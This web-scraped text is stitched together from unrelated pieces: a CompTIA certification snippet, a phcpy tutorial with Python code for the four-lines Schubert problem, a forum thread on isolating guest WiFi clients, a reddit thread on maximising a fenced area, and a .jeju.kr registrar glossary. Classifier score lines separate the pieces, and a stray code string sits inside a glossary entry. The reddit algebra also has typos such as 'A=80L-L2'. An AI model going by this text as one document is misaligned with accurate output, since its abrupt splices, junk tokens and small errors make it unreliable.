CCNA: Why IT Pros Should Earn CompTIA Network+ First. While CCNA covers select networking skills as they relate to Cisco routers, it can’t beat CompTIA Network+ for comprehensive networking skills that can be applied in a multi-vendor environment. …
Can you get a job with just a CompTIA A+ certification?
Of course it is possible to get a job with just an A+ certification. It is also possible to get a job with no certification at all. The question you’re really asking is if it is possible to get a job with an A+ certification that you wouldn’t have gotten without that credential. The answer to that is also ‘of course’.
|
__label__pos
| 0.977391 |
lines meeting four given lines
Consider as given four lines, our problem is to compute all lines which meet the four given lines in a point. In Fig. 7, the four given lines are shown in blue while the lines that meet those four lines are drawn in red.
_images/figfourlines.png
Fig. 7 Two red lines meet four blue lines in a point. Their intersection points are marked by red disks.
A line in projective 3-space is represented by two points, stored in the columns of a 4-by-2 matrix. So the space we work in is the complex 4-space. For this problem we have a formal root count, named after Pieri.
from phcpy.schubert import pieri_root_count
rc = pieri_root_count(2, 2, 0, verbose=False)
In 4-space, the dimension of the input planes equals two and also the dimension of the output planes is two. The value returned in rc is two for this problem.
a general configuration
In a general configuration, random number generators are applied to determine the points which span the input lines. The solving of a general configuration is encapsulated in the function solve_general.
def solve_general(mdim, pdim, qdeg):
"""
Solves a general instance of Pieri problem, computing the
p-plane producing curves of degree qdeg which meet a number
of general m-planes at general interpolation points,
where p = pdim and m = mdim on input.
For the problem of computing the two lines which meet
four general lines, mdim = 2, pdim = 2, and qdeg = 0.
Returns a tuple with four lists.
The first two lists contain matrices with the input planes
and the solution planes respectively.
The third list is the list of polynomials solved
and the last list is the solution list.
"""
from numpy import array
from phcpy.schubert import random_complex_matrix
from phcpy.schubert import run_pieri_homotopies
dim = mdim*pdim + qdeg*(mdim+pdim)
ranplanes = [random_complex_matrix(mdim+pdim, mdim) \
for _ in range(0, dim)]
(pols, sols) = run_pieri_homotopies(mdim, pdim, qdeg, ranplanes, \
verbose=False)
inplanes = [array(plane) for plane in ranplanes]
outplanes = [solution_plane(mdim+pdim, pdim, sol) for sol in sols]
return (inplanes, outplanes, pols, sols)
The solutions returned by run_pieri_homotopies are converted into numpy matrices, as defined by the function solution_plane.
def solution_plane(rows, cols, sol):
"""
Returns a sympy array with as many rows
as the value of rows and with as many columns
as the value of columns, using the string
represention of a solution in sol.
"""
from numpy import zeros
from phcpy.solutions import coordinates
result = zeros((rows, cols), dtype=complex)
for k in range(cols):
result[k][k] = 1
(vars, vals) = coordinates(sol)
for (name, value) in zip(vars, vals):
i, j = (int(name[1]), int(name[2]))
result[i-1][j-1] = value
return result
For the verification of the intersection conditions, the matrices of the input planes are concatenated to the solution planes and the determinant of the concatenated matrix is computed.
def verify_determinants(inps, sols, verbose=True):
"""
Verifies the intersection conditions with determinants,
concatenating the planes in inps with those in the sols.
Both inps and sols are lists of numpy arrays.
Returns the sum of the absolute values of all determinants.
If verbose, then for all solutions in sols, the computed
determinants are printed to screen.
"""
from numpy import matrix
from numpy.linalg import det
checksum = 0
for sol in sols:
if verbose:
print('checking solution\n', sol)
for plane in inps:
cat = concatenate([plane, sol], axis=-1)
mat = matrix(cat)
dcm = det(mat)
if verbose:
print('the determinant :', dcm)
checksum = checksum + abs(dcm)
return checksum
Then the main() function contains the following code.
(inp, otp, pols, sols) = solve_general(mdim, pdim, deg)
print('The input planes :')
for plane in inp:
print(plane)
print('The solution planes :')
for plane in otp:
print(plane)
check = verify_determinants(inp, otp)
print('Sum of absolute values of determinants :', check)
The polynomial system in pols with corresponding solutions in sols can be used as start system to solve specific problems, as will be done in the next section.
a real configuration
The solution of a real instance takes on input the system and corresponding solutions of a general instance.
def solve_real(mdim, pdim, start, sols):
"""
Solves a real instance of Pieri problem, for input planes
of dimension mdim osculating a rational normal curve.
On return are the planes of dimension pdim.
"""
from phcpy.schubert import real_osculating_planes
from phcpy.schubert import make_pieri_system
from phcpy.trackers import track
oscplanes = real_osculating_planes(mdim, pdim, 0)
target = make_pieri_system(mdim, pdim, 0, oscplanes, False)
rtsols = track(target, start, sols)
inplanes = [array(plane) for plane in oscplanes]
outplanes = [solution_plane(mdim+pdim, pdim, sol) for sol in rtsols]
return (inplanes, outplanes, target, rtsols)
The code for the main() is similar as when calling solve_general(), as shown above at the end of the previous section.
The points which span the planes are in projective 3-space, represented by four coordinates. In projective space, the coordinates belong to equivalence classes and all nonzero multiples of the four coordinates represented the same point. To map the points in affine space, all coordinates are divided by the first coordinate. After this division, the first coordinate equals one and is omitted. This mapping is done by the function input_generators.
def input_generators(plane):
"""
Given in plane is a numpy matrix, with in its columns
the coordinates of the points which span a line, in 4-space.
The first coordinate must not be zero.
Returns the affine representation of the line,
after dividing each generator by its first coordinate.
"""
pone = list(plane[:,0])
ptwo = list(plane[:,1])
aone = [x/pone[0] for x in pone]
atwo = [x/ptwo[0] for x in ptwo]
return (aone[1:], atwo[1:])
The solutions of the Pieri homotopies are represented in a so-called localization pattern, where the second point has its first coordinate equal to zero. To map to affine 3-space, the second point is the sum of the two generators. The function output_generators below computes this mapping.
def output_generators(plane):
"""
Given in plane is a numpy matrix, with in its columns
the coordinates of the points which span a line, in 4-space.
The solution planes follow the localization pattern
1, *, *, 0 for the first point and 0, 1, *, * for
the second point, which means that the second point
in standard projective coordinates lies at infinity.
For the second generator, the sum of the points is taken.
The imaginary part of each coordinate is omitted.
"""
pone = list(plane[:,0])
ptwo = list(plane[:,1])
aone = [x.real for x in pone]
atwo = [x.real + y.real for (x, y) in zip(pone, ptwo)]
return (aone[1:], atwo[1:])
The complete script is available in the directory examples of the source code for phcpy.
|
__label__pos
| 0.969142 |
3
The question I'm asking is, like all security, a bit open-ended, and ultimately - like all security - it involves a personal balance between ease/usability vs. risk/security:
• Should I let users' devices (1) communicate locally with each other on my WiFi AP, or (2) segregate them from each other, or (3) is there any "middle ground" between these choices?
The problem being, I don't know what user devices/applications' needs and expectations might be, nor how significant any convenience/inconvenience or security gain would be.
So I'm asking this to get a better sense of the security information and social considerations which I should take into account, and how I should assess the issues it raises, so that I can make a good quality informed decision.
Background:
My LAN is pretty simple on the WiFi side: a pfSense router that also acts as DHCP server, 3 network ports (WAN, wired LAN, Wireless AP), and firewall rules separating them.
In the past, I've handled Wifi by simply having a commodity AP on a dedicated interface of the router, setting up WPA2, device segregation, and access control on the AP, and creating rules on the router to prevent any WLAN interface traffic other than to/from the WAN. From the perspective of my LAN, WiFi security problem = solved.
I now want to "up my game" a bit. I'm swapping the commodity AP for a Netgear router running OpenWRT 15.05 as an AP, and configuring separate trusted vs parially-trusted virtual APs (the first is for me and will use 802.1X, the second is for friends/family and will use WPA2, or WPA3 when it's out and widely supported). The two sets of traffic will be on separate VLANs between AP and router.
It's primarily the "friends and family" AP setup that's relevant in this question. I'm not at all concerned about wired LAN access, or inappropriate traffic "jumping" to a trusted device, because that can be managed with VLANs and firewall rules on the router itself. But if devices are on the AP, then I have to decide what setup to adopt on the AP itself, regarding inter-device traffic.
My issue:
In the past I would have automatically gone with configuring the AP so that devices are segregated - no direct traffic between them within the AP or LAN. But in this day and age, it occurs to me, people may want/need/expect their separate devices (and those of friends) to be able to communicate with each other on the WLAN. I don't have that need, so I'm not aware at all whether or how much blocking inter-device AP traffic might be an issue to some people.
Examples:
• Communication beneficial: (1) A friend with an iPhone + iPad who may need them to communicate. (2) Two friends might want to send a file between them in some way.
• Communication adverse: (1) A friend's Windows laptop could be malwared/exploited, and attempting to use its WLAN access to probe for other WiFi device MACs and data, or to listen into/modify their sessions. (2) A neighbour or passing wardriver could try to take advantage of the WLAN or "listen in" to communications on it.
There might be other risks I should take into account, but those seem to be the main risks related to WiFi segregation issues.
So there are good reasons why segregating user devices would be beneficial to my own peace of mind as well as the friends+family who use my WiFi. But how disruptive would it be, and is it still sensible or impractical to do it these days, given how fast usage (including direct user-to-user) might be converging? Or perhaps they use other technology like Bluetooth/NFC so it's not a problem at all?
The question:
I don't really have any good way to gauge how disruptive or okay blocking inter-device traffic would be for users and apps, and I don't have a real sense of the true extent to which it will actually benefit users or I in terms of security and privacy. I don't use any apps or devices myself, which would trigger this issue.
In an ideal world I'd like to segregate all WiFi devices from each other "on principle", but I don't know the impact of any disruption this could have, or how much of a problem it is (what solutions exist), if someone is disrupted.
It's also possible (hypothetically) that the real issue could be overwhelmingly the device to AP sessions + individual traffic, which can't be segregated anyway, perhaps this makes any device segregation security benefits miniscule in consequence.
So my question can be expressed like this:
• What is the realistic situation and facts I need, both about security and about current/medium term everyday WiFi usage/expectation/connectivity, to decide how to handle this?
• What usual approaches (other than "802.1X universally required") are adopted by people who have thought about this before configuring their setup?
1
What is the realistic situation and facts I need, both about security and about current/medium term everyday WiFi usage/expectation/connectivity, to decide how to handle this?
For enterprise networks, it is best practice to segregate devices from communicating with each other as the end users don't have an implied trust with one another (I don't trust everyone on the public wifi at starbucks, so they shouldn't be able to see my device on the network). On home networks, it's all about your acceptable risk and the answer is going to be "It depends". How advanced are your users? What type of applications do they run on the network? How many users are you talking about?
What usual approaches (other than "802.1X universally required") are adopted by people who have thought about this before configuring their setup?
I run a "guest" wireless for my family and friends because I don't trust them not to click on malicious links. The devices can see each other on the network, but there are rarely more than 4 devices on this access point. This is enough network segmentation for me, as all of my workstations and servers are on a separate network than the guest wireless.
|improve this answer|||||
• 1
On an enterprise BYOD network the assumption is almost everything sent by one device to another probably goes via the LAN as its work related, not directly from John's phone to Jane's phone, I'd guess? As the traffic isn't "social". With home wifi, social apps, games, file shares etc, the individuals are much closer connected and no IT dept or company policy is involved. So I'm not sure if business norms are a good guide to what's expected or done outside work, where people are informal and usually have a much more direct connection. I don't really know what apps/uses might be involved. I'm .. – Stilez Apr 13 '18 at 13:05
• 1
... trying to get a sense of whether I have a problem/conflict here, as much as what options I have if so. Malicious links are easy, they don't have LAN access. But direct traffic to other wifi devices, without going off the AP itself? In general, to what extent an issue/risk/benefit and to what extent no issue/risk/benefit, and information needed to balance them? – Stilez Apr 13 '18 at 13:13
• 2
I guess "Enterprise" wasn't the right word, I meant public access points in general. IMHO, the maintenance to segment each device individually is too much for a small home network. I would VLAN devices by their risk level, Guest devices, IOT devices, and your own servers/workstations each on a separate VLAN and not worry about micro segmentation. – Mrdeep Apr 13 '18 at 13:18
• I've already done that. My question isn't about separating by risk/category, its about pros and cons of allowing any WiFi connected devices on the "Family+friends" SSID/virtual AP, to communicate with others on the same virtual AP, within the AP vs not allowing them? – Stilez Apr 13 '18 at 18:00
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.856086 |
all 10 comments
[–]darthjochen 1 point2 points (9 children)
sorry, this has been archived and can no longer be voted on
So you know you don't need fence on one side, so the sum of the other three sides needs to be equal to 80 feet right?
So l= length and w = width. We're gonna say that one of the w's is already used by the existing fence in the problem.
l+l+w=80 this means that 2l+w=80
And we know that the area of a rectangle is given by l*w
So we can solve for w in terms of l and find that w=80-2l
so now we can see that l*(80-2l)=area
Once there you should see that is an "open down" quadratic. That quadratic equation represents all the combinations of area as a function of the length of one of its sides. Because it is open down, its apex will represent a maximum area, namely the largest the area can get.
[–][deleted] 0 points1 point (8 children)
sorry, this has been archived and can no longer be voted on
further you could take the derivative of this parabola and set it to zero. This will be the local and global maximum. you can verify it is a maximum by numerically testing other points on the parabola. Or by taking the second derivative at this point. If it is negative then it is the maximum, if positive it is a local minmum. If it is zero, you know nothing about the curves, the world is likely ending and you should seek shelter for the dead are rising to kill us all.
[–]darthjochen 0 points1 point (1 child)
sorry, this has been archived and can no longer be voted on
This is also a way it could be done. Just wasn't sure if calculus was an option, so didn't go into it.
So if you've got that skill under your belt, its probably an easier way to get the same problem done.
Also, happy cakeday Beefy!
[–][deleted] 0 points1 point (0 children)
sorry, this has been archived and can no longer be voted on
Thanks.
[–]Skippertech[S] 0 points1 point (5 children)
sorry, this has been archived and can no longer be voted on
haha well I still need some help.. Im looking to find " What should the dimensions of the kennel be if Kip wants to give his puppies as much area as possible? What is the area of the completed region?" what should I do??? thanks:D
[–][deleted] 0 points1 point (4 children)
sorry, this has been archived and can no longer be voted on
Ok, so you see how we set up the Area equation to be a function 80L-2L2. so you take the maximum of this equation. in this case we take the derivative, and set it to zero. so 80-4L=0 or L=20
Now we only have 80 feet of fence. So 80-2L=w or w=40
now finally what is the area at the maximum? L*W =800
That was pretty easy right?
[–]Skippertech[S] 0 points1 point (1 child)
sorry, this has been archived and can no longer be voted on
" L*W =800" you sure you dont mean 80??? haha. Still a bit confused, can you show me the answer to this, I have the area but not sure how you come about the " 80-4L=0 or L=20"
thankyou for all your help. your saving me!
[–][deleted] 0 points1 point (0 children)
sorry, this has been archived and can no longer be voted on
Do you know derivatives yet? It's the rate of change or slope of a given line. In this case the area is a function that is essentially a parabola. Now the slope of a parabola is zero at the maximum/minimum of the parabola, depending on if it is a cup or a hill.
So to find the maximum of the area equation we set the derivative of the area function 80-4L equal to zero and solve for L.
[–]Skippertech[S] 0 points1 point (1 child)
sorry, this has been archived and can no longer be voted on
help:(
[–][deleted] 0 points1 point (0 children)
sorry, this has been archived and can no longer be voted on
How wide the fence will be is a function of the perimeter, which is 80, as we have 80 feet of fence, and the length of the fence.
So in essence you can have exactly 80 feet of fence for the 3 sides you must put up.
now you must have 2 sides length L and one side length W
and W+2L=80
so W=80-2L
now area is equal to L times W so
A=L*W now W=80-2L so replacing W with this we get A=L(80-2L) = 80L-2L2 =A
this is the function of area of a fence, determined by length L. The curve is at a maximum where the slop of the curve is Zero the slope of the curve is dA/dL or the change in A with respect to L is
dA/dL=80-4L =0
80=4L L=20
now we multiply this maximum L into the known equation for area
A=80L-L2 or A=L*W
80(20)-202 =20*40=800 so area is 800 also W= 80-2L=40 just in case you were wondering.
|
__label__pos
| 0.853392 |
My Cart
Toll Free
888.398.4703
International
++1.760.736.3700
.jeju.kr FAQ
.jeju.kr Glossary of Technical Terms
.INT
A top-level domain devoted solely to international treaty organizations that have independent legal personality. Such organizations are not governed by the laws of any specific country, rather by mutual agreement between multiple countries. IANA maintains the domain registry for this domain.
A record
The representation of an IPv4 address in the DNS system.
AAAA record
The representation of an IPv6 address in the DNS system.
Administrative contact
Majority of the registries require 4 contacts for a successful domain registration: Registrant, Administrative, Technical and Billing. The Administrative contact is intended to represent the Registrant(owner) of the domain, in any non-technical matters, regarding the management of the domain. Certain extensions require Administrative contact to confirm requests and accept notices about the domain name.
A-label
The ASCII-compatible encoded (ACE) representation of an internationalized domain name, i.e. how it is transmitted internally within the DNS protocol. A-labels always commence the with the prefix "xn--". Contrast with U-label.
ARPA
Originally a reference to the US Government agency that managed some of the Internet’s initial development, now a top-level domain used solely for machine-readable use by computers for certain protocols — such as for reverse IP address lookups, and ENUM. The domain is not designed for general registrations. IANA manages ARPA in conjunction with the Internet Architecture Board.
ASCII (American Standard Code for Information Interchange)
The standard for transmitting English (or "Latin") letters over the Internet. DNS was originally limited to only Latin characters because it uses ASCII as its encoding format, although this has been expanded using Internationalized Domain Names(IDN) for Applications.
Authoritative Name Server
A domain name server configured to host the official record of the contents of a DNS zone. Each Korean .jeju.kr domain name must have a set of these so computers on the Internet can find out the contents of that domain. The set of authoritative name servers for any given domain must be configured as NS records in the parent domain.
Automatic Renewal
The service of automatic renewal allows the customers the convenience of automatic billing for the services ordered through the domain registrar. If the automatic renewal is selected, customer's credit card will be automatically charged for the service, which will avoid the interruption in service.
Billing Contact
Majority of the registries require 4 contacts for a successful domain registration: Registrant, Administrative, Technical and Billing. The Billing contact is responsible for the payment of the domain, and is usually assigned to the registrar managing the domain.
Caching Resolver
The combination of a recursive name server and a caching name server.
Cloaking Forwarding
Domains can be forwarded to another URL by using a forwarding service. Cloaking forwarding differs from Apache 301 forwarding by showing the content of the URL being forwarded to, however the URL bar displays the original domain name.
CNAME Record
A CNAME record is an abbreviation for Canonical Name record and is a type of resource record in the Domain Name System (DNS) used to specify that a domain name is an alias for another domain, the "canonical" domain. CNAME has a very specific syntax rule. CNAME can only be set up for the unique subdomain, meaning that it cannot be set up for any subdomain, which has already been set up for the domain. Thus CNAME is most commonly set up for WWW subdomain.
Country-code top-level domain (ccTLD)
A Class of Top Level Domains, generally assigned or reserved by a country, sovereign state, or territory. IANA is the organization, responsible for the ccTLD assignments. Since 2010 there 2 types of ccTLDs: 2 letter ASCII characters TLDs and IDN TLDs, which consist of the native language characters. Each country/territory is able to implement certain restrictions and requirements on the ccTLD assigned to them.
Cross-Registry Information Service Protocol (CRISP)
The name of the working group at the IETF that developed the Internet Registry Information Service (IRIS), a next-generation WHOIS protocol replacement.
Delegation
Any transfer of responsibility to another entity. In the domain name system, one name server can provide pointers to more useful name servers for a given request by returning NS records. On an administrative level, sub-domains are delegated to other entities. IANA also delegates IP address blocks to regional Internet registries.
Deletion
Deletion of the domain results in the domain record being removed from the registry's database. Domain deletion procedure and availability differs depending on each of the TLD's policy. Certain extensions require additional payment to delete a domain name.
DNS zone
A section of the Domain Name System name space. By default, the Root Zone contains all domain names, however in practice sections of this are delegated into smaller zones in a hierarchical fashion. For example, the .com zone would refer to the portion of the DNS delegated that ends in .com.
DNSSEC
A technology that can be added to the Domain Name System to verify the authenticity of its data. The works by adding verifiable chains of trust that can be validated to the domain name system.
Domain lock
In order to prevent unwanted changed to the domain names, customers have an ability to change the locks on their domain names. The domain lock availability depends on individual TLD, and includes clientTransferProhibited, clientUpdateProhibited, clientDeleteProhibited, clientRenewProhibited.
Domain Name
A unique identifier with a set of properties attached to it so that computers can perform conversions. A typical domain name is "icann.org". Most commonly the property attached is an IP address, like "208.77.188.103", so that computers can convert the domain name into an IP address. However the DNS is used for many other purposes. The domain name may also be a delegation, which transfers responsibility of all sub-domains within that domain to another entity. domain name label a constituent part of a domain name. The labels of domain names are connected by dots. For example, "www.iana.org" contains three labels — "www", "iana" and "org". For internationalized domain names, the labels may be referred to as A-labels and U-labels.
Domain Name Registrar
An entity offering domain name registration services, as an agent between registrants and registries. Usually multiple registrars exist who compete with each other, and are accredited. For most generic top-level domains, domain name registrars are accredited by ICANN.
Domain Name Registry
A registry tasked with managing the contents of a DNS zone, by giving registrations of sub-domains to registrants.
Domain Name Server
A general term for a computer hardware or software server, which answers requests to convert domain names into something else. These can be subdivided into authoritative name servers, which store the database for a particular DNS zone; as well as recursive name servers and caching name servers.
Domain Name System (DNS)
The global hierarchical system of domain names. A global distributed database contains the information to perform the domain name conversations, and the most central part of that database, known as the root zone is coordinated by IANA.
Dot or “."
Common way of referring to a specific top-level domain. Dot generally precedes the Top Level domain, such as dot com is written down as “.jeju.kr”.
Expiration date
The expiration date determines when the domain registration period ends. In order to avoid downtime for the domain, renewal of the domain at least two weeks before expiration date is strongly encouraged. After the expiration date passes, some registries maintain the record of the domain name under the same owner, however the DNS services are put on hold.
Extensible Provisioning Protocol (EPP)
A protocol used for electronic communication between a registrar and a registry for provisioning domain names.
Extension
Refers to the last portion of the domain name, located after the dot. Domain extension helps determine the registry, to which domain pertains, and allows to accurately classify the domain name.
First Come, First Served (FCFS)
Multiple applications for the same domain name are not accepted. The domain will be awarded to the first registrar who submits a registration request.
FTP
File Transfer Protocol does exactly what it says. The standard network protocol allows the transfer of files from one host to another. There are many FTP clients(programs) available, which allow you to connect to your host and transfer your completed content to your hosting provider's space.
Fully-Qualified Domain Mame (FQDN)
A complete domain name including all its components, i.e. "www.icann.org" as opposed to "www".
GAC Principles
A document, formally known as the Principles for the Delegation and Administration of ccTLDs. This document was developed by the ICANN Governmental Advisory Committee and documents a set of principles agreed by governments on how ccTLDs should be delegated and run.
General Availability Phase
Domains are awarded on first come first serve basis, granted that the domains are available after the previous phases have concluded.
Generic top-level domains (gTLDs)
A class of top-level domains that are used for general purposes, where ICANN has a strong role in coordination (as opposed to country-code top-level domains, which are managed locally).
Glue Record
An explicit notation of the IP address of a name server, placed in a zone outside of the zone that would ordinarily contain that information. All name servers are in-bailiwick of the Root Zone, therefore glue records is required for all name servers listed there. Also referred to as just "glue".
Hints File
A file stored in DNS software (i.e. recursive name servers) that tells it where the DNS root servers are located.
Hostname
The name of a computer. Typically the left-most part of a fully-qualified domain name.
Http
HyperText Transfer Protocol serves as the cornerstone protocol for World Wide Web, which allows the transfer of data between clients and servers.
IANA
See Internet Assigned Numbers Authority.
IANA Considerations
A component of RFCs that refer to any work required by IANA to maintain registries for a specific protocol.
IANA Contract
The contract between ICANN and the US Government that governs how various IANA functions are performed.
IANA Staff
See Internet Assigned Numbers Authority.
ICANN
Internet Corporation for Assigned Names and Numbers(ICANN) is responsible responsible for the coordination of maintenance and methodology of several databases of unique identifiers related to the namespaces of the Internet, and ensuring the network's stable and secure operation.
Internal transfer
Internal transfer refers to a transfer of a domain name within the same registrar. This procedure may be simpler, than starting a domain transfer, which involves 2 different registrars. The internal transfer is possible, after two parties involved in the internal transfer come to an agreement about the terms of the transfer.
Internationalized domain name (IDN)
Internet domain name, which allows the use of a language-specific script or alphabet, such as Arabic, Cyrillic, and Chinese. Adoption of IDN domain names is a significant step towards including non-English speakers into the world of Internet. Internationalized domain name is stored in Domain Name System as ASCII strings, which are transcribed by the use of Punycode.
Internet Architecture Board (IAB)
The oversight body of the IETF, responsible for overall strategic direction of Internet standardization efforts. The IAB works with ICANN on how the IANA protocol parameter registries should be managed. The IAB is an activity of the Internet Society, a non-profit organization.
Internet Assigned Numbers Authority (IANA)
A department of ICANN tasked with providing various Internet coordination functions, primarily those described in a contract between ICANN and the US Government. The functions relate to ensuring globally-unique protocol parameter assignment, including management of the root of the Domain Name System and IP Address Space. ICANN staff within this department is often referred to as "IANA Staff".
Internet Coordination Policy (ICP)
A series of documents created by ICANN between 1999 and 2000 describing management procedures.
Internet Engineering Steering Group (IESG)
The committee of area experts of the IETF’s areas of work, that acts as its board of management.
Internet Engineering Task Force (IETF)
The key Internet standardization forum. The standards developed within the IETF are published as RFCs.
Internet Protocol (IP)
The fundamental protocol that is used to transmit information over the Internet. Data transmitted over the Internet is transmitted using the Internet Protocol, usually in conjunction with a more specialized protocol. Computers are uniquely identified on the Internet using an IP Address.
IP address
A unique identifier for a device on the Internet. The identifier is used to accurately route Internet traffic to that device. IP addresses must be unique on the global Internet.
IPv4
Internet Protocol version 4. Refers to the version of Internet protocol that supports 32-bit IP addresses.
IPv6
Internet Protocol version 6. Refers to the version of Internet protocol that supports 128-bit IP addresses.
Landrush Phase
This phase allows you a greater chance to obtain a domain name prior to General Availability, typically for an increased fee. The fee generally varies depending on how early you want to register. Priority is either first-come, first-served or will go to an auction cpr144449003101 if there are multiple applicants, depending on registry rules. A common fee structure that will be in use is the Early Access Program (EAP). Further details on a specific extensions landrush phase can be found under the landrush section for that a particular domain.
Mail exchange (mx) record
MX record determines which server the mail client will be retrieving the mail from. The MX records for individual domains can be set up in the DNS records section of the client's control panel.
New Generic Top Level Domain (New gTLD)
Starting on July 15th, 2013 ICANN has started process of delegating new Generic Top Level Domains, opening up new opportunities for the internet community. New extensions include popular categories like professional domains, IDNs, general interest domains, and brand domain names.
NS record
a type of record in a DNS zone that signifies part of that zone is delegated to a different set of authoritative name servers.
Parent domain
The domain above a domain in the DNS hierarchy. For all top-level domains, the Root Zone is the parent domain. The Root Zone has no parent domain as it is as the top of the hierarchy. Opposite of sub-domain.
Parking
Many of the registrars offer a free service of domain parking. This allows the customer to quickly register a domain name, and choose the hosting solution at a later date. Very often the registrar's parking DNS servers allow DNS record modification.
Pre-Registration
Paid pre-registration allows you to purchase the domain in the General Availability phase, and the domain will be submitted as soon as the General Availability phase opens.
Primary name server
Practically every domain extension requires minimum 2 DNS servers in order for the domain to be successfully registered. Primary name server is responsible for storing information about the domain routing and making it available for requests.
PTR record
The representation of a IP address to domain name mapping in the DNS system.
Recursive Name Server
A domain name server configured to perform DNS lookups on behalf of other computers.
Redelegation
The transfer of a delegation from one entity to another. Most commonly used to refer to the redelegation process used for top-level domains.
Redelegation process
A special type of root zone change where there is a significant change involving the transfer of operations of a top-level domain to a new entity.
Redemption Grace Period
Redemption Grace Period(RGP) is a period after the expiration date, in which the domain still belongs to the same client, however the functionality is put on hold. The domain can usually be restored after paying for RGP fee. gTLDs often have a Renewal Period of 30 days before the Redemption Grace Period starts.
Regional Internet Registry (RIR)
A registry responsible for allocation of IP address resources within a particular region.
Registrant
See Registrant Contact
Registrant Contact
Majority of the registries require 4 contacts for a successful domain registration: Registrant, Administrative, Technical and Billing. The Registrant contact is the owner of the domain, and is the entity that holds right to use the particular domain name.
Registrar for .jeju.kr
An entity that can act on requests from a registrant in making changes in a registry. Usually the registrar is the same entity that operates a registry, although for domain names this role is often split to allow for competition between multiple registrars who offer different levels of support.
Registry South Korea .jeju.kr
The authoritative record of registrations for a particular set of data. Most often used to refer to domain name registry, but all protocol parameters that IANA maintains are also registries.
Registry Operator for .jeju.kr South Korea
The entity that runs a registry.
Reverse IP
A method of translating an IP address into a domain name, so-called as it is the opposite of a typical lookup that converts a domain name to an IP address.
RFCs
A series of Internet engineering documents describing Internet standards, as well as discussion papers, informational memorandums and best practices. Internet standards that are published in an RFC originate from the IETF. The RFC series is published by the RFC Editor.
Root
The highest level of the domain system.
Root Servers
The authoritative name servers for the Root Zone.
Root Zone
The top of the domain name system hierarchy. The root zone contains all of the delegations for top-level domains, as well as the list of root servers, and is managed by IANA.
Root Zone Management (RZM)
The management of the DNS Root Zone by IANA.
RZM Automation
A project to automate many aspects of the Root Zone Management function within IANA. Based on a software tool originally called "eIANA".
Secondary name server
Practically every domain extension requires minimum 2 DNS servers in order for the domain to be successfully registered. Secondary server is responsible for copying information from the primary server. The original purpose of secondary server is to take over the requests, if the primary server is down. Some of the registries no longer put an emphasis on which server is primary or secondary, but many international registries still use the old standard.
Sponsoring organization
The entity acting as the trustee of a top-level domain on behalf of its designated community.
SSL
Secure Sockets Layer (SSL) is a cryptographivc protocol, which is designed to provide communication security over internet. The data entered on the websites, using SSL, is encrypted, thus making it less susceptible to data theft.
Subdomain
In the domain hierarchy, or structure, subdomain is a domain, which is a part of a larger domain. For example, "www.icann.org" is a sub-domain of "icann.org", and "icann.org" is a sub-domain of "org". Subdomains can generally be setup through a DNS server management utility as A records or CNAME records.
Sunrise Phase
A phase in which holders of eligible trademarks have the opportunity to apply and register domain names that correspond to their trademarks. To participate in Sunrise for new gTLDs, trademark holders must validate their trademarks with the Trademark Clearinghouse (TMCH) first and must provide a valid Signed Mark Data (SMD) file for submission.
Technical Contact
Majority of the registries require 4 contacts for a successful domain registration: Registrant, Administrative, Technical and Billing. The Technical contact is intended to assist the Registrant(owner) contact in any queries that pertain to the technical aspects of managing the domain name.
Trademark Clearinghouse (TMCH)
The central database of verified trademarks that was created by ICANN to provide brand protection to trademark holders during ICANN’s new gTLD program. Its' a centralized database of verified trademarks, that is connected to each and every new Top Level Domain (TLD) that will launch.
Top-level domain (TLD)
The highest level of subdivisions with the domain name system. These domains, such as ".jeju.kr" and ".uk" are delegated from the DNS Root zone. They are generally divided into two distinct categories, generic top-level domains and country-code top-level domains.
Transfer
Most commonly, the term transfer refers to a inter-registrar transfer of registrations. The procedure of the tranfer will largely depend on the TLD, and is most commonly completed by requesting an authorization code from the current registrar and initiating the transfer at another registrar.
Trust anchor
A known good cryptographic certificate that can be used to validate a chain of trust. Trust anchor repository (TAR) Any repository of public keys that can be used as trust anchors for validating chains of trust. See Interim Trust Anchor Repository (ITAR) for one such repository for top-level domain operators using DNSSEC.
Trustee
An entity entrusted with the operations of an Internet resource for the benefit of the wider community. In IANA circles, usually in reference to the sponsoring organization of a top-level domain.
U-label
The Unicode representation of an internationalized domain name, i.e. how it is shown to the end-user. Contrast with A-label.
Unicode
A standard describing a repertoire of characters used to represent most of the worlds languages in written form. Unicode is the basis for internationalized domain names.
Uniform resource locator (URL)
Uniform Resource Locator(URL), commonly known as web address, is an address to a resource on the internet. The URL consists of two components: Protocol Identifier(i.e. http, https) and the Resource name(i.e. icann.org)
Unsponsored top-level domain
A sub-classification of generic top-level domain, where there is no formal community of interest. Unsponsored top-level domains(.COM, .NET, .ORG, etc.) are administered according to the policies and processes established by ICANN.
URL Forwarding
URL Forwarding or URL redirection refers to the most common type of forwarding offered by domain registrars. Forwarding occurs when all pages from one domain are redirected to another domain.
UTF-8
A standard used for transmitting Unicode characters.
Variant
In the context of internationalized domain names, an alternative domain name that can be registered, or mean the same thing, because some of its characters can be registered in multiple different ways due to the way the language works. Depending on registry policy, variants may be registered together in one block called a variant bundle. For example, "internationalise" and "internationalize" may be considered variants in English.
Variant bundle
A collection of multiple domain names that are grouped together because some of the characters are considered variants of the others.
Variant table
A type of IDN table that describes the variants for a particular language or script. For example, a variant table may map Simplified Chinese characters to Traditional Chinese characters for the purpose of constructing a variant bundle.
Web host (Hosting Provider)
Web host is a type of an Internet service, which allows users to host content and/or email services by providing hosting space. Most often the hosting providers include control panels and tools for building a website and maintaining mail records.
WHOIS
A simple plain text-based protocol for looking up registration data within a registry. Typically used for domain name registries and IP address registries to find out who has registered a particular resource. (Usage note: not "Whois" or "whois")
WHOIS database
Used to refer to parts of a registry’s database that are made public using the WHOIS protocol, or via similar mechanisms using other protocols (such as web pages, or IRIS). Most commonly used to refer to a domain name registry’s public database.
WHOIS gateway
An interface, usually a web-based form, that will perform a look-up to a WHOIS server. This allows one to find WHOIS information without needing a specialized computer program that speaks the WHOIS protocol.
WHOIS server
A system running on port number 43 that accepts queries using the WHOIS protocol.
Wire format
The format of data when it is transmitted over the Internet (i.e. "over the wire"). For example, an A-label is the wire format of an internationalized domain name; and UTF-8 is a possible wire format of Unicode.
XML
A machine-readable file format for storing structured data. Used to represent web pages (in a subset called HTML) etc. Used by IANA for storing protocol parameter registries.
Zone (DNS Records)
The zone file, also know as the DNS records is a vital component of DNS system, which contains various DNS records, which point to the location of content and email servers for each individual domain. Editing zone is made possible in the client's control panel.
